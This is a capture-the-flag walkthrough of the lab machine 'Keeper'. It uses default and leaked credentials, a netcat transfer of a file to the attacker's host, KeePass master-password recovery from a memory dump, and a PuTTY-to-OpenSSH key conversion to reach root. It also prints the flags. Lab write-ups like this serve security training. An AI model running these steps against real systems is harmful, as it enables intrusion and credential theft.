Keeper

Recon

nmap_scan.log

HTTP (80)

Update DNS

Writeup.png

Writeup-1.png

Using default credentials we are able to login. https://docs.bestpractical.com/rt/4.2.8/README.html

Creds: root:password

Writeup-2.png

New user password leaked

Writeup-3.png

SSH (22)

Creds: lnorgaard:Welcome2023!

└─$ sshpass -p 'Welcome2023!' ssh lnorgaard@keeper.htb
lnorgaard@keeper:~$ id
uid=1000(lnorgaard) gid=1000(lnorgaard) groups=1000(lnorgaard)

User.txt

lnorgaard@keeper:~$ cat user.txt
be3a5cac866608bdd2fc99a62cce4eaf

Privilege Escalation

lnorgaard@keeper:~/t$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx
lnorgaard@keeper:~/t$ file *
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type
passcodes.kdbx:      Keepass password database 2.x KDBX
RT30000.zip:         Zip archive data, at least v2.0 to extract, compression method=deflate

We can bruteforce the password of KeePass, but it also has a memory dump file which is odd.

keepass-password-dumper

First download zip

└─$ listen > RT30000.zip
---
lnorgaard@keeper:~/t$ busybox nc 10.10.14.42 4444 < RT30000.zip

Recover the password

➜ .\keepass_password_dumper.exe C:\Users\user\VBoxShare\KeePassDumpFull.dmp
...
Password candidates (character positions):
Unknown characters are displayed as "●"
1.:     ●
2.:     ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M,
3.:     d,
4.:     g,
5.:     r,
6.:     ø,
7.:     d,
8.:      ,
9.:     m,
10.:    e,
11.:    d,
12.:     ,
13.:    f,
14.:    l,
15.:    ø,
16.:    d,
17.:    e,
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde

Password seems to be M}dgrød med fløde, but it doesn't work. If we Google this it's some kind of dish and Google corrects us on the name. Trying it with title case doesn't work, but all lowercase works.

Password: rødgrød med fløde

Writeup-4.png

Creds: root:F4><3K0nd!

Root password didn't work...

Putty key can be converted to OpenSSH:

└─$ sudo apt install putty-tools
# puttygen your-putty-key.ppk -O private-openssh -o converted-key
└─$ puttygen root_note.txt -O private-openssh -o root.id_rsa
└─$ chmod 600 root.id_rsa

└─$ ssh root@keeper.htb -i root.id_rsa
root@keeper:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@keeper:~# cat root.txt
7820e89795eab3cbf4c6378373081014